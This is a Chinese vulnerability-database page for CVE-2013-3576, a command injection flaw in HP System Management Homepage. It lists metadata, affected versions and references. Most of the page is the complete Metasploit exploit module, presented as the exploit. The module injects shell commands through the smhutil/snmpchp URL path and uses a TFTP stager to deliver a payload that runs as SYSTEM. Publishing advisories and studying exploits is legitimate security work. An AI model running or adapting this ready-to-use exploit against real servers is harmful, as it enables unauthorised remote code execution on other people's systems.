HP System Management Homepage 命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121719 漏洞类型 操作系统命令注入
发布时间 2013-06-24 更新时间 2013-09-21
CVE编号 CVE-2013-3576 CNNVD-ID CNNVD-201306-225
漏洞平台 Windows CVSS评分 9.0
|漏洞来源
https://www.exploit-db.com/exploits/26420
https://www.securityfocus.com/bid/60471
https://cxsecurity.com/issue/WLB-2013060186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201306-225
|漏洞详情
HPSystemManagementHomepage(SMH)是美国惠普(HP)公司发布的一个基于Web的界面。该界面可整合和简化对运行HP-UX、Linux和MicrosoftWindows操作系统的HP服务器的单系统管理过程。HPSystemManagementHomepage(SMH)中的ginkgosnmp.inc中存在漏洞。远程认证攻击者可通过向smhutil/snmpchp.php.en的PATH_INFO中发送shell元字符,从而利用该漏洞执行任意代码。
|漏洞EXP
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP System Management Homepage JustGetSNMPQueue Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in HP System Management Homepage.  By
        supplying a specially crafted HTTP request, it is possible to control the
        'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
        which will be used in a exec() function.  This results in arbitrary code execution
        under the context of SYSTEM.  Please note: In order for the exploit to work, the
        victim must enable the 'tftp' command, which is the case by default for systems
        such as Windows XP, 2003, etc.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2013-3576'],
          ['OSVDB', '94191'],
          ['US-CERT-VU', '735364']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 11 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(2381),
        # USERNAME/PASS may not be necessary, because the anonymous access is possible
        OptString.new("USERNAME", [false, 'The username to authenticate as']),
        OptString.new("PASSWORD", [false, 'The password to authenticate with'])
      ], self.class)
  end


  def peer
    "#{rhost}:#{rport}"
  end


  def check
    cookie = ''

    if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
      cookie = login
      if cookie.empty?
        print_error("#{peer} - Login failed")
        return Exploit::CheckCode::Safe
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end

    sig = Rex::Text.rand_text_alpha(10)
    cmd = Rex::Text.uri_encode("echo #{sig}")
    uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"

    req_opts = {}
    req_opts['uri'] = uri
    if not cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
    end

    res = send_request_raw(req_opts)
    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end


  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    cookie = ''

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => '/proxy/ssllogin',
      'vars_post' => {
        'redirecturl'         => '',
        'redirectquerystring' => '',
        'user'                => username,
        'password'            => password
      }
    })

    if not res
      fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
    end

    # CpqElm-Login: success
    if res.headers['CpqElm-Login'].to_s =~ /success/
      cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
    end

    cookie
  end


  def setup_stager
    execute_cmdstager({ :temp => '.'})
  end


  def execute_command(cmd, opts={})
    # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
    uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")

    req_opts = {}
    req_opts['uri'] = uri
    if not @cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
    end

    print_status("#{peer} - Executing: #{cmd}")
    res = send_request_raw(req_opts)
  end


  def exploit
    @cookie = ''

    if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
      @cookie = login
      if @cookie.empty?
        fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end

    @uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
    setup_stager
  end
end
|受影响的产品
HP System Management Homepage 6.2.2 7 HP System Management Homepage 2.2.8 HP System Management Homepage 2.2.6 HP System Management Homepage 2.1.12 HP System Management Homepage 2.1.11
|参考资料

来源:US-CERTVulnerabilityNote:VU#735364
名称:VU#735364
链接:http://www.kb.cert.org/vuls/id/735364
来源:BID
名称:60471
链接:http://www.securityfocus.com/bid/60471